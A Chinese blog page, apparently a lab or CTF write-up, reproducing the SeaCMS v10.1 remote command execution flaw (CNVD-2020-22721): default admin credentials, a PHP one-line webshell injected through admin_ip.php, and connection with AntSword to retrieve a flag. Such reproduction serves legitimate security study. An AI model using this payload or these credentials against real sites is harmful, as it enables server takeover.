当前位置: 首页 > article >正文

seacms 远程命令执行 (CNVD-2020-22721)

article 2024/11/26 23:10:29

漏洞描述:

        海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin

漏洞复现:

登录后台

点击确认,burp进行抓包

上传一句话木马

";eval($_POST[1]);//

中国蚁剑连接

http://193.168.0.45:43466/manager/admin_ip.php

成功获取flag


http://www.kler.cn/a/410577.html

相关文章:

  • 深度学习——3种常见的Transformer位置编码【sin/cos、基于频率的二维位置编码(2D Frequency Embeddings)、RoPE】
  • 道品智能科技移动式水肥一体机:农业灌溉施肥的革新之选
  • MySQL原理简介—10.SQL语句和执行计划
  • [每日一氵] 拆分 pip install git+https://github.com/xxx/xx.git@bece3d4
  • candence: 常用的一些命令: Move / Mirror / Rotate / Spain / Fix / unFix / Flipdesign
  • 使用POLL函数实现聊天室
  • 将django+vue项目发布部署到服务器
  • SpringBoot开发——Maven多模块工程最佳实践及详细示例
  • 图像处理学习笔记-20241118
  • 11.22 深度学习-pytorch自动微分
  • Android Configuration相关
  • 戴尔 AI Factory 上的 Agentic RAG 搭载 NVIDIA 和 Elasticsearch 向量数据库
  • 基于SpringBoot实现的民宿管理系统(代码+论文)
  • 11超全局变量php
  • 10、PyTorch autograd使用教程
  • redis的List底层数据结构 分别什么时候使用双向链表(Doubly Linked List)和压缩列表(ZipList)
  • Git(一)基本使用
  • 如何使用docker启动一个gitlab
  • 僵尸毁灭工程 服务搭建 联机教程 无需公网IP、服务器
  • fiddler抓包工具与requests库构建自动化报告
  • 第三十九章:Grafana 概述、Docker安装与验证指南
  • 【Linux】认识进程以及进程的状态
  • 非交换几何与黎曼ζ函数:数学中的一场革命性对话
  • ubuntu24挂载硬盘记录
  • 故障排除-------K8s挂载集群外NFS异常
  • 【数据结构】树——链式存储二叉树的基础